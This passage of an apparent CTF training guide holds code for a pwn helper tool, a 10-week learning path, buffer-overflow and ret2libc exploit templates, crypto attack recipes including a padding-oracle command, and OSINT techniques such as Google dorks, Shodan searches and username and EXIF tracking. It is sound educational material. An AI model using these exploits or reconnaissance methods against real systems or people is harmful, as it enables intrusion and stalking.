        return {"error": f"Unknown template: {template_name}"}
    code = template.format(**kwargs)
    outfile = f"exploit_{template_name}.py"
    with open(outfile, "w") as f:
        f.write(code)
    return {"generated": outfile, "code": code}

Adding a custom binary analyzer

# Add: automatic vuln function detector (grep for dangerous libc calls)
import subprocess, re

DANGEROUS_FUNCTIONS = [
    "gets", "strcpy", "strcat", "sprintf", "scanf",
    "vsprintf", "memcpy",  # check if size is user-controlled
    "system",              # if reachable, it's a win condition
]

def find_dangerous_calls(binary_path):
    result = subprocess.run(
        ["objdump", "-d", binary_path],
        capture_output=True, text=True
    )
    findings = []
    for fn in DANGEROUS_FUNCTIONS:
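        # Match the exact symbol (optionally the __isoc99_ variant and @plt suffix)
        pattern = re.compile(rf'call.*<(?:__isoc99_)?{re.escape(fn)}(?:@plt)?>')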
        matches = pattern.findall(result.stdout)
        if matches:
            findings.append({"function": fn, "calls": len(matches)})
    return {"dangerous_calls": findings}

# Register as ctfpwn operation:
# { "name": "vuln_scan", "description": "Detect dangerous libc call sites" }

Extending the ROP chain finder

# ctfpwn rop_chain already runs ROPgadget — extend it to auto-suggest chains

from pwn import ROP, ELF

def suggest_rop_chain(binary_path):
    elf = ELF(binary_path)
    rop = ROP(elf)
    suggestions = []

    # Try ret2win
    for sym in ["win", "shell", "flag", "backdoor", "get_flag"]:
        if sym in elf.sym:
            suggestions.append({
                "type": "ret2win",
                "target": sym,
                "address": hex(elf.sym[sym])
            })

    # Check for system@plt
    if "system" in elf.plt:
        suggestions.append({
            "type": "ret2plt_system",
            "note": "system@plt found — pair with /bin/sh string and pop rdi gadget"
        })

    # Check for syscall gadget (for SROP)
    try:
        syscall = rop.find_gadget(["syscall", "ret"])
        if syscall:
            suggestions.append({"type": "srop_candidate",
                                 "syscall_gadget": hex(syscall.address)})
    except Exception:
        pass

    return {"suggestions": suggestions}

Learning Path

Recommended resources (free first)

Resource | Format | Focus
pwn.college | Free interactive course | Binary exploitation from first principles (ASU curriculum)
exploit.education | Free VMs | Phoenix/Protostar challenges (stack, heap, format string)
CTFtime.org | Event listing | Find live CTFs by difficulty, category
TryHackMe: Heap Exploitation | Guided lab | tcache, fastbin, house-of-force
pwntools docs | Reference | Complete API for ELF, ROP, tubes, cyclic
Hacking: The Art of Exploitation (Jon Erickson) | Book | x86 ASM, stack overflows, shellcoding from scratch
ROP Emporium | Free challenges | 8 progressive ROP exercises (ret2win → SROP)
how2heap | Code + explanation | Every heap technique with working PoC (tcache, fastbin, etc.)

Practice progression (10 weeks)

Week 1 — Assembly and memory
  ▸ pwn.college: Assembly Crash Course module
  ▸ Write "hello world" in nasm x86-64 assembly, compile, run
  ▸ GDB basics: break, run, x/20xg $rsp, info registers

Week 2 — Stack overflows (no mitigations)
  ▸ exploit.education: Protostar stack0–stack6
  ▸ ctfpwn analyze + bof_detect on each binary
  ▸ pwn.college: Program Interaction module

Week 3 — ret2win and shellcode
  ▸ ROP Emporium: ret2win (x86 and x86-64)
  ▸ Write 24-byte shellcode: execve("/bin/sh", NULL, NULL)
  ▸ pwn.college: Shellcode Injection module

Week 4 — Defeating NX: ROP chains
  ▸ ROP Emporium: split → callme → write4 → badchars
  ▸ Learn ROPgadget and ropper
  ▸ Build a ret2libc chain manually (no pwntools helpers)

Week 5 — ASLR + PIE bypass
  ▸ ROP Emporium: fluff → pivot → ret2csu
  ▸ Practice: leak GOT entry → compute libc base → ret2system
  ▸ ctfpwn rop_chain on a PIE binary

Week 6 — Stack canary bypass
  ▸ Format string leak + overflow combo
  ▸ exploit.education: Format String challenges
  ▸ ctfpwn format_string on a test binary

Week 7 — Heap fundamentals
  ▸ how2heap: tcache_poisoning, fastbin_dup
  ▸ TryHackMe: Heap Exploitation room
  ▸ ctfpwn heap_exploit on a test program

Week 8 — CTF practice
  ▸ CTFtime.org — join a beginner CTF (picoCTF, HSCTF)
  ▸ Solve at least 3 pwn challenges
  ▸ Read writeups for challenges you couldn't solve

Week 9 — Kernel basics
  ▸ pwn.college: Kernel Exploitation module (intro)
  ▸ Learn: kernel module structure, syscall table, ret2user

Week 10 — Competition readiness
  ▸ Set up a fast environment: pwndbg + pwntools + tmux
  ▸ Build a challenge template (ctfpwn generate or your own)
  ▸ Join a real CTF team on CTFtime.org

Essential tools

Tool | Purpose | Install
pwntools | Exploit scripting: ELF, ROP, tubes, cyclic | pip install pwntools
pwndbg | GDB plugin: heap vis, ROP search, context | yay -S pwndbg
ROPgadget | Find ROP gadgets in binaries | pip install ROPGadget
ropper | Alternative gadget finder with filtering | pip install ropper
Ghidra | NSA decompiler: C pseudocode from binary | ghidra-sre.org (free)
checksec | Binary mitigation summary | included with pwntools
one_gadget | Find one-shot execve gadgets in libc | gem install one_gadget

L1 Buffer Overflow From Scratch

What is the Stack, What is a Buffer, and Why It Overflows

A buffer overflow is one of the oldest and most fundamental vulnerability classes in software security. It occurs when a program writes more data into a fixed-size memory region (buffer) than that region can hold, overwriting adjacent memory. On the stack, the memory adjacent to local variable buffers includes the saved return address - the location the function will jump to when it returns. Overwriting the return address lets you control where execution goes.

The Stack Layout
The stack grows downward in memory (toward lower addresses). When a function is called: the arguments are pushed first, then the return address (EIP/RIP), then the saved base pointer (EBP/RBP), then space for local variables. If a local variable is a char array and you write too many bytes into it, you overwrite EBP and then the return address sitting just above it in memory.
Finding the Offset
You need to know exactly how many bytes to write before reaching the return address. Use pattern_create (Metasploit) or cyclic (pwntools) to generate a non-repeating pattern. Send it as input, wait for the crash, then read the value in EIP - pattern_offset or cyclic_find tells you the exact offset. This is the number of bytes of padding you need before writing your controlled return address.
ret2libc
Modern systems use NX (No-Execute), which prevents running shellcode on the stack. ret2libc bypasses NX by returning into existing code in libc rather than custom shellcode. On 32-bit x86 the overwritten stack holds, in order: the address of system() in libc, a placeholder return address for system() (often exit()), and the address of the string "/bin/sh" as its argument. On x86-64 the argument is passed in RDI instead, so a pop rdi ; ret gadget must load it first. No new code is executed; you only redirect execution to existing trusted functions.
Protections to Know
ASLR (Address Space Layout Randomization): randomizes where the stack, heap, and libraries load. Bypass with an info leak or brute-force (32-bit). Stack Canary: a random value placed between the buffer and return address - the program checks it before returning; if changed, it crashes. Bypass requires leaking the canary value first. PIE: randomizes the binary's own base address. Check protections with checksec binary.
# Generate a cyclic pattern to find the offset (pwntools)
pwn cyclic 200 | ./vulnerable_binary
  # pwntools CLI; print(cyclic(200)) under Python 3 would send the b'...' repr instead of raw bytes

# After crash, find offset from EIP value
python3 -c "from pwn import *; print(cyclic_find(0x61616161))"
  # 0x61616161 is the value found in EIP register after the crash

# Basic 32-bit BOF exploit template
from pwn import *

offset = 76         # bytes until EIP overwrite
ret_addr = 0x080491b6    # address of win() function from objdump/GDB

payload = b'A' * offset
payload += p32(ret_addr)   # little-endian packed address

p = process('./vuln')
p.sendline(payload)
p.interactive()

# Check binary protections
checksec ./vulnerable_binary
  # shows: NX, PIE, Stack Canary, RELRO status
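The 32-bit ret2libc stack layout described under ret2libc above (system, a return address for system, then the "/bin/sh" pointer) can be built with struct alone. A sketch with placeholder addresses: every address below is invented, and on a real target they come from the leaked or known libc base.

```python
import struct


def ret2libc32(offset, system_addr, exit_addr, binsh_addr):
    """Padding, then [system][return address for system][arg1 = "/bin/sh"]."""
    chain = struct.pack("<III", system_addr, exit_addr, binsh_addr)
    return b"A" * offset + chain


payload = ret2libc32(
    offset=76,               # bytes until EIP overwrite, as in the template above
    system_addr=0xF7E12340,  # placeholder: system() in libc
    exit_addr=0xF7E05670,    # placeholder: exit(), gives a clean return
    binsh_addr=0xF7F5A0CF,   # placeholder: "/bin/sh" string in libc
)
print(len(payload), payload[76:].hex())
```

The middle word matters: system() treats it as its own return address, so pointing it at exit() avoids a crash after the shell closes.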

Recognizing and Breaking Common Crypto Challenges

CTF crypto challenges test your ability to identify a cipher type from ciphertext characteristics, recognize implementation weaknesses, and apply the correct mathematical attack. You rarely need to implement attacks from scratch - libraries and tools exist for most classic attacks. The skill is knowing which attack applies to which scenario.

XOR with Short Key
XOR with a short repeating key works like a Vigenere cipher over bytes and is broken by frequency analysis. The key length can be found by computing the Index of Coincidence or using the Kasiski test. Once you know the key length, each key position reduces to a single-byte XOR (the byte-level analogue of a Caesar shift) that frequency analysis solves. Tool: xortool automates this. Recognizer: byte frequencies in the ciphertext are noticeably uneven, unlike the near-uniform output of a modern cipher.
RSA with Small e
If the RSA exponent e is small (e=3) and the plaintext m is small enough that m^e < n, then c = m^e mod n equals m^e with no modular reduction. Take the integer cube root of c to get m directly. Coppersmith's attack extends this to larger plaintexts when part of the message is already known. Tool: RsaCtfTool.py automates many RSA weaknesses.
CBC Padding Oracle
In CBC mode, each ciphertext block is decrypted and the result is then XOR'd with the previous ciphertext block to produce the plaintext. If the server reveals whether decryption produced valid PKCS7 padding (even via an error message or response time), you can recover plaintext one byte at a time without the key. Expect about 128 requests per byte on average (256 at worst). Tool: PadBuster, padbuster.py.
Recognizing Cipher Types
Base64 uses A-Za-z0-9+/ and often ends with = padding. Hex uses only 0-9 and A-F (either case). A ciphertext whose length is always a multiple of a fixed size suggests a block cipher (AES block = 16 bytes). Ciphertext the same length as the plaintext suggests a stream cipher or XOR. Ciphertext given as one or two very large numbers suggests RSA or elliptic curve. CyberChef's "magic" function auto-detects many encodings.
Common Number Theory Attacks
Wiener's attack: RSA with a very small private exponent d (roughly d < n^(1/4) / 3) is vulnerable. Fermat's factorization: if p and q are close together, n can be factored quickly. Hastad's broadcast attack: when the same plaintext is encrypted with the same small e under at least e different public keys, the Chinese Remainder Theorem (CRT) combines the ciphertexts and an integer e-th root recovers the plaintext directly.
Hash Weaknesses
Length extension attack: MD5, SHA-1, and SHA-256 are vulnerable when you know H(secret + message) and the length of the secret. You can then compute H(secret + message + padding + extension) without knowing the secret itself. Tool: hashpump. MD5 collisions: finding two different inputs that produce the same MD5 hash is computationally feasible. Use hashclash or pre-computed collision pairs from the literature.
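The repeating-key XOR attack from the first card can be sketched in a few lines once the key length is known. This is a deliberately crude sketch: it assumes the plaintext is lowercase English with spaces and scores candidates by counting such bytes, where a real tool would use proper letter-frequency statistics. The sample plaintext, the key b"ctf", and the function names are made up for the demonstration.

```python
from itertools import cycle

# Bytes expected to dominate the plaintext (assumption: lowercase English text).
TEXT_BYTES = set(b" abcdefghijklmnopqrstuvwxyz")


def xor(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def best_key_byte(column: bytes) -> int:
    """Pick the key byte that turns the most bytes into letters or spaces."""
    def score(k: int) -> int:
        return sum((b ^ k) in TEXT_BYTES for b in column)
    return max(range(256), key=score)


def recover_key(ciphertext: bytes, key_len: int) -> bytes:
    """Solve each key position independently as a single-byte XOR."""
    return bytes(best_key_byte(ciphertext[i::key_len]) for i in range(key_len))


plaintext = b"the quick brown fox jumps over the lazy dog and keeps running"
ciphertext = xor(plaintext, b"ctf")

key = recover_key(ciphertext, 3)  # key length assumed known, e.g. from xortool
print(key, xor(ciphertext, key))
```

Slicing with ciphertext[i::key_len] collects every byte encrypted under the same key byte, which is what reduces the problem to independent single-byte XORs.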
# XOR key length detection with xortool
xortool ciphertext.bin
  # tries a range of key lengths and ranks the most probable ones

# RSA small e attack with RsaCtfTool
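python3 RsaCtfTool.py --publickey pubkey.pem --uncipherfile ciphertext.bin
  # --uncipher expects the ciphertext value itself; newer releases rename these options to --decrypt / --decryptfile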

# CBC padding oracle with PadBuster
padbuster "http://target/decrypt.php?cipher=CIPHERTEXT" CIPHERTEXT 16
  # 16 = AES block size in bytes

# Convert various encoding types (CyberChef equivalent in CLI)
python3 -c "import base64; print(base64.b64decode('SGVsbG8='))"
python3 -c "print(bytes.fromhex('48656c6c6f'))"

# Factor n with Fermat's method (Python; fast only when p and q are close)
from math import isqrt  # Python 3.8+

def fermat_factor(n):
    # n must be odd; look for a such that a*a - n is a perfect square
    a = isqrt(n)
    if a * a < n:
        a += 1
    b2 = a * a - n
    while isqrt(b2) ** 2 != b2:
        a += 1
        b2 = a * a - n
    b = isqrt(b2)
    return a - b, a + b
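The small-exponent RSA case described earlier comes down to an exact integer root. The sketch below uses a binary search so it stays exact for very large integers (floating-point roots would not). The modulus is a stand-in built from two Mersenne primes purely so that m^3 < n holds; it is not taken from any real challenge, and integer_root is a hypothetical helper name.

```python
def integer_root(x: int, n: int) -> tuple:
    """Return (floor of the n-th root of x, whether the root is exact)."""
    lo, hi = 0, 1 << (x.bit_length() // n + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** n <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** n == x


# Stand-in modulus (assumption for the demo); the attack never uses p, q, or d.
n = (2**521 - 1) * (2**607 - 1)
e = 3
m = int.from_bytes(b"flag{small_e}", "big")
c = pow(m, e, n)  # m**e < n, so no modular reduction takes place

root, exact = integer_root(c, e)
recovered = root.to_bytes((root.bit_length() + 7) // 8, "big")
print(exact, recovered)
```

If the root is not exact, the plaintext was large enough to wrap around n, and this direct approach does not apply.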

Finding Information That Was Never Meant to Be Public

OSINT (Open Source Intelligence) is the practice of collecting information from publicly available sources. In CTFs, OSINT challenges test your ability to find information that is technically public but not easily discoverable. In real pentests, OSINT is the reconnaissance phase - gathering target information before any active scanning. Passive OSINT sends no packets to the target itself.

Username Enumeration
The same username is often used across multiple platforms. Tools like Sherlock and WhatsMyName check hundreds of social media sites, forums, and services for a given username. Following a target's username across platforms reveals linked accounts, profile photos, bios, posts, and historical information on services they may have forgotten about. sherlock username (or python3 sherlock username from a source checkout) checks 300+ sites.
EXIF Metadata
JPEG and other image files contain EXIF metadata: GPS coordinates, camera model, timestamp, and sometimes the photographer's name. Images posted online may retain this metadata if the platform does not strip it (many do now - Facebook strips EXIF, some forums do not). Tool: exiftool image.jpg. GPS coordinates reveal where a photo was taken.
Google Dorks
Google advanced operators narrow search results dramatically. site:target.com filetype:pdf finds PDFs on a domain. inurl:admin site:target.com finds admin panels. "index of" site:target.com finds open directory listings. cache:target.com/page used to retrieve Google's cached version of a deleted page, but Google retired its cache in 2024; the Wayback Machine (web.archive.org) is the usual fallback.
Shodan for Infrastructure
Shodan indexes the banners of internet-connected devices. Search operators: org:"Target Company" finds all their assets. hostname:target.com finds subdomains. ssl:"Target Corp" finds TLS certificates issued to them. port:8080 http.title:"Dashboard" finds specific panels. This reveals infrastructure that may not be in DNS records.
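For the EXIF card above, GPS coordinates usually need converting before they can be pasted into a map. The sketch below assumes exiftool's default text output of the form 40 deg 26' 46.32" N; the sample lines are made up, and dms_to_decimal is a hypothetical helper, not part of exiftool.

```python
import re

# Matches degrees, minutes, seconds, and hemisphere, e.g. 40 deg 26' 46.32" N
_DMS = re.compile(r"""(\d+) deg (\d+)' ([\d.]+)" ([NSEW])""")


def dms_to_decimal(text: str) -> float:
    """Convert one degrees/minutes/seconds coordinate to signed decimal degrees."""
    match = _DMS.search(text)
    if match is None:
        raise ValueError(f"no DMS coordinate found in {text!r}")
    degrees, minutes, seconds, ref = match.groups()
    value = int(degrees) + int(minutes) / 60 + float(seconds) / 3600
    # South and West are negative in decimal notation.
    return -value if ref in "SW" else value


# Invented sample lines in the assumed exiftool format.
lat = dms_to_decimal("GPS Latitude  : 40 deg 26' 46.32\" N")
lon = dms_to_decimal("GPS Longitude : 79 deg 58' 56.00\" W")
print(f"{lat:.6f},{lon:.6f}")
```

The printed "lat,lon" pair is the form most map search boxes accept directly.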
# Username search across platforms
sherlock targetusername

# Extract EXIF from an image (check for GPS coordinates)
exiftool downloaded_photo.jpg | grep -i "gps\|location\|latitude\|longitude"

# Google dorks (run in browser)
# Find login pages:      site:target.com inurl:login
# Find exposed files:    site:target.com ext:sql OR ext:bak OR ext:conf
# Find subdomains:       site:*.target.com
# Find cached pages:     cache:target.com/deleted-page   (operator retired by Google in 2024; try web.archive.org)

# Shodan CLI search
shodan search --fields ip_str,port,org "hostname:target.com"
shodan host 8.8.8.8   # lookup a specific IP

# Certificate transparency logs (find subdomains via SSL certs)
# %25 is the URL-encoded % wildcard
curl -s "https://crt.sh/?q=%25.target.com&output=json" | \
  python3 -c "import sys,json; print('\n'.join(c['name_value'] for c in json.load(sys.stdin)))" | sort -u

# Reverse image search for identity linking
# Download the image, then use Google Images or TinEye to find other appearances
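The certificate transparency lookup above returns entries whose name_value field can hold several hostnames separated by newlines, plus wildcard entries. A minimal sketch of cleaning that output into a subdomain list follows; the sample JSON is invented and only mirrors the name_value field used in the command above, and subdomains_from_crtsh is a hypothetical helper name.

```python
import json


def subdomains_from_crtsh(raw_json: str, domain: str) -> list:
    """Return sorted, de-duplicated hostnames under `domain` from crt.sh JSON."""
    names = set()
    for entry in json.loads(raw_json):
        # One certificate entry may list several names, one per line.
        for name in entry["name_value"].splitlines():
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # drop the wildcard label
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


# Invented sample data standing in for a saved crt.sh response.
sample = json.dumps([
    {"name_value": "www.target.com\nmail.target.com"},
    {"name_value": "*.dev.target.com"},
    {"name_value": "WWW.target.com"},
])

print(subdomains_from_crtsh(sample, "target.com"))
```

Saving the curl output to a file and passing its contents to this function keeps the network request and the parsing separate, which makes the parsing easy to rerun offline.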